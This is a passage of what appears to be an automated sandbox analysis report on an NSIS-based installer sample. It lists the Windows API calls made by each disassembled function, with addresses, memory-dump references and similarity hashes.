                    • RegCloseKey.ADVAPI32(?), ref: 00401523
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                    • Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
                    • Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                    • Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
                    • VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    • GlobalFree.KERNEL32(007B9B50), ref: 00402139
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 3376005127-0
                    • Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                    • Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
                    • Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                    • Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58
                    APIs
                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                    • Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
                    • Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                    • Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758
                    APIs
                    • lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
                    • wsprintfW.USER32 ref: 00403FBD
                    • SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                    • Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
                    • Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                    • Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C
                    APIs
                    • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
                    • lstrlenW.KERNEL32(004120F8), ref: 00402567
                    • RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
                    • RegCloseKey.ADVAPI32(?), ref: 004025B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID:
                    • API String ID: 1356686001-0
                    • Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                    • Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
                    • Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                    • Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C
                    APIs
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                      • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                      • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                      • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                      • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                      • Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                      • Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E
                    • WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                    • String ID:
                    • API String ID: 3585118688-0
                    • Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                    • Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
                    • Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                    • Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
                    • lstrlenA.KERNEL32(?), ref: 00402739
                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                    • String ID:
                    • API String ID: 2568930968-0
                    • Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                    • Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
                    • Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                    • Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69
                    APIs
                    • GetDC.USER32(?), ref: 00401EF7
                    • GetDeviceCaps.GDI32(00000000), ref: 00401EFE
                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E
                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • CreateFontIndirectW.GDI32(0041E110), ref: 00401F61
                      • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                    • String ID:
                    • API String ID: 1599320355-0
                    • Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                    • Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
                    • Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                    • Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D
                    APIs
                    • DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
                    • GetTickCount.KERNEL32 ref: 00402E6B
                    • CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                    • String ID:
                    • API String ID: 2102729457-0
                    • Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                    • Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
                    • Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                    • Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
                    • GlobalFree.KERNEL32(00000000), ref: 00405C62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                    • String ID:
                    • API String ID: 2883127279-0
                    • Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                    • Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
                    • Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                    • Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00404403
                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471
                      • Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                    • Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
                    • Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                    • Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA
                    APIs
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                      • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                    • lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 004060A3
                    • GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: le@
                    • API String ID: 3248276644-3503961380
                    • Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                    • Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
                    • Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                    • Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE
                    APIs
                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: PrivateProfileStringlstrcmp
                    • String ID: !N~
                    • API String ID: 623250636-529124213
                    • Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                    • Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
                    • Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                    • Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94
                    APIs
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                    • CloseHandle.KERNEL32(?), ref: 0040571E
                    Strings
                    • Error launching installer, xrefs: 004056F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: Error launching installer
                    • API String ID: 3712363035-66219284
                    • Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
